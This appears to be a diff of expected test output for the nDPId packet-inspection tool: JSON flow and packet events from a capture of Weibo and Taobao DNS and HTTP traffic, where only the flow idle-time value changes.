00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1463089073289,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1463089073289,"pkt":"kDVu60UQeJKcD6iOCABFAAA+KCVAAEARjs\/AqAFpwKgBAYQeADUAKn2XkPcBAAABAAAAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAQ=="} 00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073319,"flow_last_seen":1463089073319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073319,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1463089073319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073319,"pkt":"kDVu60UQeJKcD6iOCABFAAA8H8hAAEAGdDDAqAFpXbyG9oveAFCCZhY7AAAAAKACchAAKAAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073321,"flow_last_seen":1463089073321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073321,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1463089073321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073321,"pkt":"kDVu60UQeJKcD6iOCABFAAA80r9AAEAGwTjAqAFpXbyG9ovfAFBlcdtMAAAAAKACchBYCgAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073322,"flow_last_seen":1463089073322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073322,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1463089073322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073322,"pkt":"kDVu60UQeJKcD6iOCABFAAA8W1BAAEAGOKjAqAFpXbyG9ovgAFAoLVKkAAAAAKACchAd9QAAAgQFtAQCCAoAQQn0AAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073334,"flow_last_seen":1463089073334,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073334,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1463089073334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073334,"pkt":"kDVu60UQeJKcD6iOCABFAAA8E7RAAEAGgETAqAFpXbyG9ovhAFAJpBpDAAAAAKACchB02wAAAgQFtAQCCAoAQQn3AAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073382,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi944y47WgmYWPKAS\/\/+aeQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073382,"pkt":"kDVu60UQeJKcD6iOCABFAAA0H8lAAEAGdDfAqAFpXbyG9oveAFCCZhY8OMuO14AQAOXIRAAAAQEICgBBCgMDdgyi"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9\/6KbWaZXHbTaAS\/\/8KOQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA00sBAAEAGwT\/AqAFpXbyG9ovfAFBlcdtN+im1m4AQAOU4BAAAAQEICgBBCgMDdgyi"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+DI1jKOKC1SpaAS\/\/+EggAAAgQFqAQCCAoDdgyjAEEJ9AEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA0W1FAAEAGOK\/AqAFpXbyG9ovgAFAoLVKlyNYyj4AQAOWyTgAAAQEICgBBCgMDdgyj"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073384,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+Gi04d5CaQaRKAS\/\/+sgAAAAgQFqAQCCAoDdgyjAEEJ9wEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073384,"pkt":"kDVu60UQeJKcD6iOCABFAAA0E7VAAEAGgEvAqAFpXbyG9ovhAFAJpBpEotOHeoAQAOXaTwAAAQEICgBBCgMDdgyj"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073319,"flow_last_seen":1463089073319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073319,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1463089073319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073319,"pkt":"kDVu60UQeJKcD6iOCABFAAA8H8hAAEAGdDDAqAFpXbyG9oveAFCCZhY7AAAAAKACchAAKAAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073321,"flow_last_seen":1463089073321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073321,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1463089073321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073321,"pkt":"kDVu60UQeJKcD6iOCABFAAA80r9AAEAGwTjAqAFpXbyG9ovfAFBlcdtMAAAAAKACchBYCgAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073322,"flow_last_seen":1463089073322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073322,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1463089073322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073322,"pkt":"kDVu60UQeJKcD6iOCABFAAA8W1BAAEAGOKjAqAFpXbyG9ovgAFAoLVKkAAAAAKACchAd9QAAAgQFtAQCCAoAQQn0AAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073334,"flow_last_seen":1463089073334,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073334,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1463089073334,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073334,"pkt":"kDVu60UQeJKcD6iOCABFAAA8E7RAAEAGgETAqAFpXbyG9ovhAFAJpBpDAAAAAKACchB02wAAAgQFtAQCCAoAQQn3AAAAAAEDAwc="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1463089073382,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073382,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi944y47WgmYWPKAS\/\/+aeQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1463089073382,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073382,"pkt":"kDVu60UQeJKcD6iOCABFAAA0H8lAAEAGdDfAqAFpXbyG9oveAFCCZhY8OMuO14AQAOXIRAAAAQEICgBBCgMDdgyi"} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9\/6KbWaZXHbTaAS\/\/8KOQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA00sBAAEAGwT\/AqAFpXbyG9ovfAFBlcdtN+im1m4AQAOU4BAAAAQEICgBBCgMDdgyi"} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+DI1jKOKC1SpaAS\/\/+EggAAAgQFqAQCCAoDdgyjAEEJ9AEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA0W1FAAEAGOK\/AqAFpXbyG9ovgAFAoLVKlyNYyj4AQAOWyTgAAAQEICgBBCgMDdgyj"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1463089073384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073384,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+Gi04d5CaQaRKAS\/\/+sgAAAAgQFqAQCCAoDdgyjAEEJ9wEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1463089073384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073384,"pkt":"kDVu60UQeJKcD6iOCABFAAA0E7VAAEAGgEvAqAFpXbyG9ovhAFAJpBpEotOHeoAQAOXaTwAAAQEICgBBCgMDdgyj"} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1463089073393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"thread_ts_msec":1463089073393,"pkt":"eJKcD6iOkDVu60UQCABFAACRAABAAEARtqHAqAEBwKgBaQA1RnMAfV+\/WFGBgAABAAMAAAAAAnUxA2ltZwZtb2JpbGUEc2luYQJjbgAAAQABwAwABQABAAAACQAZBWFkaW1nBGdzbGIIc2luYWVkZ2UDY29tAMAzAAUAAQAAAAoADQV3ZWlibwRncmlkwD7AWAABAAEAAAAvAATeSRxg"} 00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073393,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.28.96"}} 